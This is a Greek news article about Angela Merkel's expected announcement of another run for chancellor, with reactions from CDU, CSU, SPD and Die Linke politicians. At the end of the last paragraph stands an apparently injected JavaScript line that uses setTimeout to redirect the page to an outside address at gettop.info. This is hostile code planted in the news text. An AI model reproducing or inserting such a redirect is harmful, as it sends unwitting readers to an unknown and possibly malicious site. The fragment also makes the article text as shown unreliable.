Εν αναμονή της ανακοίνωσης της υποψηφιότητας από τη Μέρκελ

0
2

 

Όλοι γνωρίζουν ότι θα είναι ξανά υποψήφια για την καγκελαρία η Άνγκελα Μέρκελ αναφέρουν σχεδόν όλα τα στελέχη των CDU και CSU. Όπως είπε ο επικεφαλής της Επιτροπής Εξωτερικών Σχέσεων του Ευρωπαϊκού Κοινοβουλίου, Γερμανός χριστιανοδημοκράτης (CDU) ευρωβουλευτής Έλμαρ Μπροκ στην Rhein-Neckar-Zeitung «Ο τρόπος της ανακοίνωσης είναι δευτετερεύων. Δεν υπάρχει κανένας άλλος υποψήφιος ή υποψήφια».

Αύριο η καγκελάριος Μέρκελ θα δώσει συνέντευξη τύπου και αναμένεται να ανακοινώσει εάν θα είναι υποψήφια για την προεδρία του κόμματος και υποψήφια καγκελάριος.

Σύμφωνα με την ίδια εφημερίδα και το υψηλόβαθμο στέλεχος του χριστιανοκοινωνικού κόμματος της Βαυαρίας, το CSU, θεωρεί δεδομένο ότι η Μέρκελ θα είναι υποψήφια. «Πάντα θεωρούσαμε πιθανό ότι θα θέλει να είναι και πάλι και θα είναι και πάλι».

Από την πλευρά του το SPD προτίθεται να αποφασίσει για τον δικό του υποψήφιο ανεξάρτητα από την απόφαση της Μέρκελ σύμφωνα με την αναπληρωτή πρόεδρο του Μανουέλα Σβέσιγκ: «Θεωρώ ορθό και σημαντικό να μην φερόμεθα και αγόμεθα από την επικαιρότητα και τις εικασίες», είπε στον δημόσιο τοπικό ραδιοσταθμό της Στουτγάρδης SWR. «Το τι κάνει το CDU είναι δική του υπόθεση και το τι κάνουμε εμείς δική μας. Ο πρόεδρος του SPD θα κάνει την πρότασή του στη σωστό χρονική στιγμή», πρόσθεσε.

Στο ερώτημα εάν ο νυν πρόεδρος του Ευρωπαϊκού Κοινοβουλίου Μάρτιν Σούλτς έχει φιλοδοξίες να είναι ο ίδιος υποψήφιος καγκελάριος, η Σβέσιγκ είπε ότι δεν θέλει να συμμετάσχει σε εικοτολογίες: «Το γεγονός ότι το σοσιαλδημοκρατικό κόμμα διαθέτει περισσότερα στελέχη τα οποία θα μπορούσαν να είναι υποψήφιοι (ενν. εκτός από τον Ζίγκγμαρ Γκαμπριελ) είναι καλό, διότι δεν είναι καλό να περιοριζόμαστε σε ένα πρόσωπο. Γι’ αυτό και θα πάρουμε τη σωστή απόφαση».

Η Σάρα Βάγκενκνεχτ, η επικεφαλής της ΚΟ του Die Linke, θεωρεί τον Ζίγκμαρ Γκάμπριελ ως τον λάθος υποψήφιο για το SPD. «Σε ένα μεγάλο κόμμα όπως το SPD θα πρέπει να υπάρχουν και πραγματικοί σοσιαλδημοκράτες, οι οποίοι να θεωρούνται αξιόπιστοι από τους ψηφοφόρους. Αντίθετα, ο Ζίγκμαρ Γκάμπριελ είναι από τις αρχές του αιώνα υπέρ μιας πολιτικής η οποία τα βρίσκει με τους οικονομικά ισχυρούς και εγκαταλείπει τους παραδοσιακούς του ψηφοφόρους»», είπε σε συνέντευξή της στις εφημερίδες του δημοσιογραφικού ομίλου Funke. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here